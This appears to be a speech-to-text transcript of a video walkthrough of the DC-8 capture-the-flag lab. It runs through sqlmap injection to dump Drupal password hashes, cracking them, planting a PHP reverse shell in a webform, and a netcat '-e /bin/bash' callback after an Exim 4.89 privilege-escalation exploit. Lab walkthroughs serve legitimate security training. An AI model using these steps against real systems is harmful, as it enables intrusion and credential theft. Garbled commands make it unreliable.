Hello guys, welcome back to a Pentesters Club. Today we're going to solve another CTF challenge name called DC8. So what is the basic penetration testing methodologies we use here? So the basic penetration testing methodologies we use here: network discovery, enumeration, exploitation, privilege escalation, and capture the root flag. So first open the terminal. So you just type sudo su and enter the password. So you just type net discover minus I is 0. So we find our hosting machine is here. So we just quit now. We just type nmap minus 34 minus a is an aggressive scan and enter. So now let's wait for the nmap result. So we got the nmap result. One is available with SSH, another one is available with Apache server. So now we would like to look here, open Firefox, then go to the targeted website 192.168.0.103. So you can see here it is in Drupal CMS. So how we would like to exploit this Drupal CMS and get the root privilege access. So that's our target. So first we would like to look at contact us. So here you can see here it's a very important message. This module has a distributed site over the next few weeks. While we resolve a few outstanding issues, we apply for any inconvenience. So okay, now we would like to look one is also the same thing. So we would like to look at two. It's also a same thing, but we are not getting a right full result. So we would like to type here we got it here like it's in SQL state 42000. It's a syntax error and violating 1046. You have an error in SQL syntax, so check manually with this one. So now what we would like to do here is, so this our target is 2, so you just copy entirely, come back here. So first we would like to do the SQL injection. So you just type SQL map minus u and paste the targeted IP address, and you need to specify to get DBS, and you just type batch risk 3 level 5. So I would like to use a level 5 to get without getting too much errors. So how I would like to use here, so I use a risk factor is in 3 and level is in 5, so you can increase up to a 10th level, so you can get it information. So we got here a 2 information, uh, DB D7 database. So we would like to go to now D7 database. So now come back here. So in the DBS place, so I just enter D7 DBS, okay, DB, and you need to get tables. So now we are getting the tables from here. So we got the tables. In the tables we can see here all have multiple tables. It's like 88 tables we have here. So in the 88 tables we have find only the users. So we would like to get now users. So we just type now let's see, we get the users. So we got it in the columns like multiple things. So we would like to look here. So what else we would like to get it from here? So it's have multiple things. So we would like to get the right result here. So come back here. So it's have lengthy type. So we would like to get a simplified things here. So now come back here. So I just need to delete from here. So I just specify from the tables is the users, and I would like to get from the users as a columns. That's it. So in the user steps we get all the columns. So now we would like to get the usernames and password. So we would like to get I want to dump the name and password, otherwise user ID, otherwise the password. So I want to dump only the name and password, so that's enough for us. So now we would like to come back here. So you just type capital C, name and password, name, password, dump. That's it. So we are going to dump this one. So we have successfully dumped this one. So now we would like to copy this one. Just copy. So we would like to crack this one. So you just type nano hash1 and paste it this. Control O and Control X. So now you just type John hash1. Now you just type show. So we have successfully cracked the password. Username of John is an turtle. So now we would like to go with we would like to come back here, new tab. We just type a directory buster, HTTP, and enter your targeted IP address 0.103. So also we would like to look here something changelog txt. So but we not yet get any useful information from here. Now you can see here HTTP generator Drupal 7 and includes themes install license.txt. Now we would like to get only a user. If we can get it a user, we would like to go further. It's take a bit lengthy time to grab here. So now let's wait for this. It's too taking a much time. Yes, now we have successfully got it here user. So just copy, come back here. So you just need to type user. So we got it here user. Username is John. Password is turtle. So we have successfully logged into here. So now we can see here it is in context, structure, configuration and help. So now come back here. So without wasting RAM, so you just close this. Now type here. So you just type ifconfig. This is your targeted IP address. Okay, now we would like to come back here. Now click on configuration, then add a content to a web forms. No have anything here. Add a content. No. Find a content. So we would like to look add in the contact us. So now we would like to click on the web forms. Then click on form settings. So thanks for taking a contact us. So we should be contact us soon. So we just type remove. So you just enter. So you just need to enter your pentest monkey. So and you just need to write in a PHP code here. So now come back here. So your targeted IP address is 111. So you just type I already have pentest monkey here as an reverse shell. So you need to get it from the source if you know how. So you need to come back here. So you just need to change your targeted IP address. Save. Entirely you just copy and paste it. Now open this. Close this. So you just type a filter HTML. So we have entered successfully before this. So I just type here. So I want to save this one in a PHP code. Then come back here. Click on save configuration. So the settings has been saved in the PHP code. Now come back here from components, then view. So in the contact us, so we would like to enter the targeted thing. So you just type netcat minus lvnp1234. Now come back here. So you just enter name, choice is yours. Then enter the details is Drupal CMS. So but we are not get the right result here. So we would like to modify something here. Go back to the form, web form, from settings. So we just need to entirely just copy and delete it. Come back here. Just type mousepad rshell.php. So it's 192.168.311. So now we would like to look. It's a 111. Port is everything clear. So where is the mistake is happened? So we would like to look that one. So we just entirely now copy, close this. So now come back again. So we just need to paste it here. Now first we would like to type like plain text, then try to save the configuration. Now we would like to look, then we would like to type a PHP code, then come back here. Let's then click on save configuration. So we have successfully saved here. Now what we would like to do here is then come back here. So enter 123.com. Now we have successfully got the reverse shell. You can see here in the this tab. So we have successfully got the reverse shell. So you just type ID, we are in the got. So you just type Python. We would like to type which Python. So you just type Python -c import pdy span bin bash. So we have successfully got it here. So now what we would like to do here is next. So the next is we would like to type, so you just type find prm -u equal to yes. So we would like to find any type of weak vulnerabilities is available in the system or not. ef2 is greater than dev or null. Sorry. Dev or null. So now let's see how we can get it done here. So we can see here user SBN exim4. So now we would like to look exim. So now we would like to type exim -version. You just type head -1. So its a version is 4.89. So we would like to go and look. Open new tab. You just type exim 4.89 in exploit.db. So exploit.db will help you a lot to get all the exploits from here. Come back here. So this is an exploit. So you can see here. So we would like to, if you want to download, you can click on download. So you just click on the view on raw. So entirely you just copy this one. Copy. Now come back here. So you just type mousepad exploit.sh. And you just pasted this entirely of the code. You just save it. So also you can look it out here. When you come back here, go back, look here. So usage is like set user ID. So now we can look here how we can use this. Set UID. So usage is in netcat. So we would like to use with a netcat. So now come back here. So exploit.sh -m in the netcat. So now we just type, come back here, list. So here have exploit.sh. So you just type python -m http.server. Now come back here. You just type cd temp directory wget http 192.168.0.1 111 8000 exploit.sh. Oh, sorry, I have entered a wrong way. wget http 192.168.0.111 exploit.sh. So now we would like to set up a netcat listener here. So file, new tab, we just type netcat minus lvnp 7890. That's it. And we would like to type. So when you come back here, we would like to give a permission list minus al chmod plus x exploit dot sh. Now we just type bash exploit dot sh, and we just need to copy this minus m netcat, control copy, come back here and paste it. So we have set up the netcat listener and we would like to execute this one. Now let's wait for 5 seconds. So we already successfully get the root shell. So now we need to enter our targeted IP address netcat minus e bin bash. Enter your targeted IP address 192.168.0.1117890. So this is my targeted port. Then if I enter, now we have successfully connected here. So you just type id, we are in the root. You can see here we are in the root. So you just type cd root list minus al, you just type cat. Oh, it's executed already. So now again we would like to execute this. So now we would like to execute again. Where is this command? Bash exploit with the netcat. So just copy, come back and paste it. So now let's wait again. Netcat minus e bin bash, enter your target IP address 0.1117890. Now it's successfully connected. You just type cd root list minus al, you just type get flag.txt. So we have successfully completed this lab. So you try it your own guys. Thank you guys for watching. Keep smiling.